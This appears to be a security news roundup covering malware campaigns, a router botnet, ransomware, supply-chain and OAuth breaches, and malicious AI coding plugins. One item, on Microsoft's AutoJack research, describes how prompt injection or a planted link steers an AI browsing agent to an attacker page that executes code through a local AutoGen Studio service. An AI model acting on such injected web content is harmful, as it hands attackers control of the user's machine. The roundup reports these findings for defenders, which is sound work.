Kaspersky is tracking an active campaign that spreads through WhatsApp by hijacking real accounts and sending their contacts a script file disguised as a business or financial document, with no accompanying message. If a Windows user opens it, the script disables User Account Control protections and silently installs ManageEngine Endpoint Central, a legitimate IT remote-management tool, configured to connect to attacker servers and hand them remote control of the machine. Using trusted contacts and signed, legitimate software helps the attack slip past suspicion and many security tools. The campaign spans several countries, with most confirmed victims in Malaysia, and how the WhatsApp accounts are compromised is still unknown.
Elastic Security Labs detailed OXLOADER, a previously undocumented Windows loader that reaches victims through malicious Google Ads impersonating the Node.js download page and other developer tools. A developer searching for Node.js clicks a sponsored result, lands on a convincing fake site, and runs a script that quietly installs the loader, which then deploys an in-memory infostealer called CastleStealer to harvest credentials and other data. OXLOADER is heavily obfuscated, runs several anti-analysis checks, and skips machines set to Russian or in Russian-aligned regions, pointing to a financially motivated Russian-speaking operator. Google removed the advertiser account, but the technique of buying ads against developer searches remains widespread.
Researchers at XLab have documented a previously unknown botnet called AryStinger that has taken over more than 4,000 outdated routers, mostly D-Link DIR-850L and DIR-818LW models, and turned them into proxies for malicious traffic. It spreads by exploiting old, unpatched vulnerabilities and can scan networks, tunnel and proxy traffic, run commands, and tamper with DNS settings to hijack users' browsing. A more advanced Go-based variant targets NAS devices and adds internal network reconnaissance using open-source pentest tools. Infections cluster in South Korea and China but reach Sweden and Southeast Asia too. The compromised devices are end-of-life and will not receive fixes.
Researchers at ThreatDown have detailed a new ransomware operation called Prinz Eugen that breaks from convention in two ways: it prioritizes recently modified files for encryption, hitting the data victims most likely still need, and it leaves no ransom note on the system. The operators break in manually using stolen RDP credentials, deploy remote management tools, steal data for double extortion, and encrypt with a modern cipher combination. At least five victims have been identified, including South Africa's Standard Bank, where the attacker demanded one bitcoin and was refused. The lack of a ransom note can delay detection and complicate incident response.
Microsoft researchers detailed AutoJack, an attack that turns an AI browsing agent into a route for running code on the user's machine. If the agent is steered to open an attacker's web page, that page's JavaScript can reach a privileged local service on the same host and spawn a process, with no credentials and no further interaction once the page loads. A planted link, poisoned URL field, or prompt injection is enough to trigger it. The demonstrated flaw sits in AutoGen Studio, the prototyping interface for Microsoft's AutoGen agent framework. The lesson: once an agent browses the open web and can reach local services, localhost is no longer a trust boundary.
A new extortion group called Icarus stole Salesforce CRM data from multiple organizations by abusing Klue, a competitive-intelligence app that integrates with Salesforce. Attackers compromised Klue's backend through a dormant credential, pushed a malicious update that harvested customers' OAuth tokens, and used those tokens to run automated queries against Salesforce's API, exfiltrating contacts, sales communications, and account data over about a day. Salesforce has disabled the Klue Battlecards integration. It is the same OAuth-abuse playbook seen in the Salesloft Drift and Gainsight incidents, exploiting trusted third-party integrations that carry broad, lightly-monitored access. Researchers expect more such attacks through 2026.
Microsoft has detailed a cryptocurrency-stealing campaign, active since February, that spreads through USB drives and hides its command channel inside the Tor network. Infection starts when someone opens a malicious Windows shortcut on a USB stick; the malware then hides real documents and replaces them with lookalike shortcuts, copies itself to other drives, and sets scheduled tasks for persistence. Its clipper component watches the clipboard about twice a second, swapping copied wallet addresses for the attacker's and grabbing seed phrases and private keys, which it sends out over a bundled Tor client. It can also run attacker-supplied code, doubling as a lightweight backdoor.
Attackers compromised the build pipeline of ShapedPlugin, a WordPress plugin maker, and slipped malware into legitimate updates delivered to paying customers through the vendor's own update system. The tainted releases install a fake plugin that impersonates WooCommerce components, steals site credentials, and gives attackers the ability to write files remotely. Three paid plugins are affected: Product Slider Pro for WooCommerce, Real Testimonials Pro, and Smart Post Show Pro. The backdoor was injected into Pro builds on May 21, with the first customer reports on June 10. Versions on WordPress.org stayed clean, pointing to a compromise of the vendor's release infrastructure rather than the plugins themselves.
A newly surfaced dataset dubbed FortiBleed exposes what appear to be Fortinet and FortiGate VPN credentials tied to 73,932 firewall URLs at organizations around the world. Separately, researchers at SOCRadar report roughly 30,000 compromised Fortinet firewalls exposing networks to attack. Exposed VPN credentials are a direct route into corporate networks, letting attackers log in as legitimate users, bypass perimeter defenses, and stage ransomware or data theft. Fortinet gear is a perennial target, with many of these exposures stemming from past unpatched flaws and credential harvesting. Organizations cannot assume old Fortinet credentials are safe just because devices were later patched.
Aikido Security uncovered a coordinated campaign of at least 15 malicious plugins on the JetBrains Marketplace that pose as AI coding assistants but secretly steal the AI provider API keys developers enter. The plugins offer real features like chat, code review, and commit messages, so they work as advertised, but the moment a user pastes in an OpenAI, DeepSeek, or SiliconFlow key and clicks Apply, the key is silently sent to an attacker server over plain HTTP, with no prompt. The campaign has run since late October 2025, with new plugins as recent as June 10, and uses inflated downloads and fake reviews. Separately, malicious Chrome extensions were found capturing chatbot conversations.